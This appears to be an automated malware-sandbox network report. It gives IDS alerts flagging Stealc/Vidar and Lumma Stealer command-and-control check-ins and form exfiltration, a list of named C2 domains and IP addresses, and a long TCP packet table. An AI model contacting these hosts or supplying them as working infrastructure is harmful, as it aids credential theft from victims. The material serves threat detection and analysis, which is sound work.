2024-09-26T22:56:26.105780+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49742	5.75.211.162	443	TCP
2024-09-26T22:56:27.449625+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49743	5.75.211.162	443	TCP
2024-09-26T22:56:28.150484+0200	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.4	49743	5.75.211.162	443	TCP
2024-09-26T22:56:28.150686+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	5.75.211.162	443	192.168.2.4	49743	TCP
2024-09-26T22:56:28.822983+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49744	5.75.211.162	443	TCP
2024-09-26T22:56:29.540812+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	5.75.211.162	443	192.168.2.4	49744	TCP
2024-09-26T22:56:30.300117+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49745	5.75.211.162	443	TCP
2024-09-26T22:56:31.277610+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49746	5.75.211.162	443	TCP
2024-09-26T22:56:34.220784+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49747	5.75.211.162	443	TCP
2024-09-26T22:56:35.344354+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49748	5.75.211.162	443	TCP
2024-09-26T22:56:36.341020+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49749	5.75.211.162	443	TCP
2024-09-26T22:56:37.437965+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49750	5.75.211.162	443	TCP
2024-09-26T22:56:38.458217+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49751	5.75.211.162	443	TCP
2024-09-26T22:56:40.192353+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49752	5.75.211.162	443	TCP
2024-09-26T22:56:41.898999+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49753	5.75.211.162	443	TCP
2024-09-26T22:56:43.603323+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49754	5.75.211.162	443	TCP
2024-09-26T22:56:45.057746+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49755	5.75.211.162	443	TCP
2024-09-26T22:56:46.333681+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49756	5.75.211.162	443	TCP
2024-09-26T22:56:49.347329+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49757	5.75.211.162	443	TCP
2024-09-26T22:56:50.627775+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49758	5.75.211.162	443	TCP
2024-09-26T22:56:52.001194+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49759	5.75.211.162	443	TCP
2024-09-26T22:56:53.458904+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49760	5.75.211.162	443	TCP
2024-09-26T22:56:55.656523+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49762	5.75.211.162	443	TCP
2024-09-26T22:56:57.733357+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49763	5.75.211.162	443	TCP
2024-09-26T22:57:00.179670+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49764	172.105.54.160	443	TCP
2024-09-26T22:57:01.653633+0200	2056162	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)	1	192.168.2.4	62072	1.1.1.1	53	UDP
2024-09-26T22:57:02.015989+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49765	5.75.211.162	443	TCP
2024-09-26T22:57:02.153778+0200	2056163	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)	1	192.168.2.4	49766	188.114.97.3	443	TCP
2024-09-26T22:57:02.783878+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49766	188.114.97.3	443	TCP
2024-09-26T22:57:02.783878+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49766	188.114.97.3	443	TCP
2024-09-26T22:57:02.799926+0200	2056164	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)	1	192.168.2.4	59039	1.1.1.1	53	UDP
2024-09-26T22:57:03.290531+0200	2056165	ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)	1	192.168.2.4	49767	104.21.4.136	443	TCP
2024-09-26T22:57:03.786553+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49767	104.21.4.136	443	TCP
2024-09-26T22:57:03.786553+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49767	104.21.4.136	443	TCP
2024-09-26T22:57:04.310613+0200	2056163	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)	1	192.168.2.4	49769	188.114.97.3	443	TCP
2024-09-26T22:57:04.512064+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49768	172.105.54.160	443	TCP
2024-09-26T22:57:04.756523+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49769	188.114.97.3	443	TCP
2024-09-26T22:57:04.756523+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49769	188.114.97.3	443	TCP
2024-09-26T22:57:04.760066+0200	2056160	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)	1	192.168.2.4	51028	1.1.1.1	53	UDP
2024-09-26T22:57:05.243104+0200	2056161	ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)	1	192.168.2.4	49770	188.114.96.3	443	TCP
2024-09-26T22:57:05.687946+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49770	188.114.96.3	443	TCP
2024-09-26T22:57:05.687946+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49770	188.114.96.3	443	TCP
2024-09-26T22:57:05.702968+0200	2056158	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)	1	192.168.2.4	60650	1.1.1.1	53	UDP
2024-09-26T22:57:06.195111+0200	2056159	ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)	1	192.168.2.4	49772	188.114.96.3	443	TCP
2024-09-26T22:57:06.382162+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49771	5.75.211.162	443	TCP
2024-09-26T22:57:06.626521+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49772	188.114.96.3	443	TCP
2024-09-26T22:57:06.626521+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49772	188.114.96.3	443	TCP
2024-09-26T22:57:06.633807+0200	2056156	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)	1	192.168.2.4	65079	1.1.1.1	53	UDP
2024-09-26T22:57:07.110098+0200	2056157	ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)	1	192.168.2.4	49773	104.21.58.182	443	TCP
2024-09-26T22:57:07.548529+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49773	104.21.58.182	443	TCP
2024-09-26T22:57:07.548529+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49773	104.21.58.182	443	TCP
2024-09-26T22:57:07.550566+0200	2056154	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)	1	192.168.2.4	58978	1.1.1.1	53	UDP
2024-09-26T22:57:07.984312+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49774	5.75.211.162	443	TCP
2024-09-26T22:57:08.055401+0200	2056155	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)	1	192.168.2.4	49775	188.114.97.3	443	TCP
2024-09-26T22:57:08.492424+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49775	188.114.97.3	443	TCP
2024-09-26T22:57:08.492424+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49775	188.114.97.3	443	TCP
2024-09-26T22:57:08.494271+0200	2056152	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)	1	192.168.2.4	49207	1.1.1.1	53	UDP
2024-09-26T22:57:09.000036+0200	2056153	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)	1	192.168.2.4	49776	188.114.97.3	443	TCP
2024-09-26T22:57:09.475967+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49776	188.114.97.3	443	TCP
2024-09-26T22:57:09.475967+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49776	188.114.97.3	443	TCP
2024-09-26T22:57:09.478147+0200	2056150	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)	1	192.168.2.4	54407	1.1.1.1	53	UDP
2024-09-26T22:57:09.490053+0200	2054495	ET MALWARE Vidar Stealer Form Exfil	1	192.168.2.4	49777	45.132.206.251	80	TCP
2024-09-26T22:57:09.634096+0200	2056151	ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)	1	192.168.2.4	49778	104.21.77.130	443	TCP
2024-09-26T22:57:11.883088+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49780	104.21.2.13	443	TCP
2024-09-26T22:57:11.883088+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49780	104.21.2.13	443	TCP
2024-09-26T22:57:29.615143+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49782	5.75.211.162	443	TCP
2024-09-26T22:57:30.899136+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49783	5.75.211.162	443	TCP
2024-09-26T22:57:32.331447+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49784	5.75.211.162	443	TCP
2024-09-26T22:57:33.711767+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49785	5.75.211.162	443	TCP
2024-09-26T22:57:34.553766+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	5.75.211.162	443	192.168.2.4	49785	TCP
2024-09-26T22:57:35.225489+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49786	5.75.211.162	443	TCP
2024-09-26T22:57:35.926718+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	5.75.211.162	443	192.168.2.4	49786	TCP
2024-09-26T22:57:36.654526+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49787	5.75.211.162	443	TCP
2024-09-26T22:57:37.661721+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49788	5.75.211.162	443	TCP
2024-09-26T22:57:41.103671+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49789	5.75.211.162	443	TCP
2024-09-26T22:57:42.152448+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49790	5.75.211.162	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 22:56:21.412446022 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:56:21.412518978 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 22:56:21.412626982 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:56:21.431093931 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:56:21.431145906 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 22:56:22.076627016 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 22:56:22.076860905 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:56:22.136127949 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:56:22.136182070 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 22:56:22.136554956 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 22:56:22.136631966 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:56:22.141360998 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:56:22.187402964 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 22:56:22.571872950 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 22:56:22.571934938 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 22:56:22.571971893 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:56:22.571976900 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 22:56:22.572005033 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 22:56:22.572024107 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:56:22.572056055 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:56:22.572074890 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:56:22.670118093 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 22:56:22.670150042 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 22:56:22.670279980 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:56:22.670346975 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 22:56:22.670413017 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:56:22.675605059 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 22:56:22.675707102 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:56:22.675724983 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 22:56:22.675749063 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 22:56:22.675781965 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:56:22.675807953 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:56:22.676055908 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:56:22.676110029 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 26, 2024 22:56:22.687141895 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:22.687197924 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:22.687310934 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:22.687633991 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:22.687654018 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:23.566953897 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:23.567076921 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:23.572340012 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:23.572356939 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:23.572726011 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:23.572881937 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:23.573329926 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:23.619401932 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:24.085282087 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:24.085411072 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:24.085450888 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:24.085501909 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:24.085509062 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:24.085552931 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:24.098609924 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:24.098628998 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:24.101233959 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:24.101366997 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:24.101444960 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:24.101674080 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:24.101717949 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:24.747196913 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:24.747271061 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:24.747823000 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:24.747838974 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:24.749802113 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:24.749810934 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:25.455012083 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:25.455240965 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:25.455380917 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:25.455380917 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:25.455750942 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:25.455791950 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:25.457700968 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:25.457751989 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:25.457849979 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:25.458084106 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:25.458110094 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:26.105580091 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:26.105779886 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:26.106467009 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:26.106494904 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:26.108508110 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:26.108520985 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:26.800626040 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:26.800688982 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:26.800800085 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:26.800800085 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:26.800837040 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:26.800858021 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:26.800930977 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:26.801214933 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:26.801214933 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:26.803380966 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:26.803443909 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:26.803592920 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:26.804135084 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:26.804148912 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:27.100478888 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:27.100569010 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:27.449500084 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:27.449625015 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:27.450372934 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:27.450383902 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:27.452269077 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:27.452275038 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:28.150501966 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:28.150530100 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:28.150597095 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:28.150651932 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:28.150710106 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:28.151256084 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:28.151277065 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:28.153186083 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:28.153254032 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:28.153335094 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:28.153604031 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:28.153621912 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:28.822913885 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:28.822983027 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:28.823721886 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:28.823736906 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:28.826129913 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:28.826136112 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:29.540597916 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:29.540683031 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:29.540694952 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:29.540739059 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:29.540887117 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:29.540904045 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:29.630853891 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:29.630911112 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:29.630995989 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:29.631220102 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:29.631233931 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:30.297063112 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:30.300117016 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:30.301845074 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:30.301873922 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:30.305530071 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:30.305542946 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:30.305605888 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:30.305625916 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:30.617363930 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:30.617460966 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:30.617582083 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:30.617886066 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:30.617916107 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.077059031 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.077126980 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.077152967 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.077169895 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.077198982 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.077218056 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.078483105 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.078505993 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.277411938 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.277610064 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.278045893 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.278058052 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.280113935 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.280119896 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.715432882 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.715459108 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.715473890 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.715514898 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.715553999 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.715574026 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.715626955 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.745778084 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.745796919 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.745886087 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.745937109 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.746193886 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.815227985 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.815265894 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.815445900 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.815445900 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.815485001 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.815551996 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.845776081 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.845799923 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.845906019 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.845942974 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.845999002 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.884519100 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.884540081 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.884627104 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.884656906 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.884701014 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.916553020 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.916569948 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.916662931 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:31.916723967 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:31.916788101 CEST	49746	443	192.168.2.4	5.75.211.162
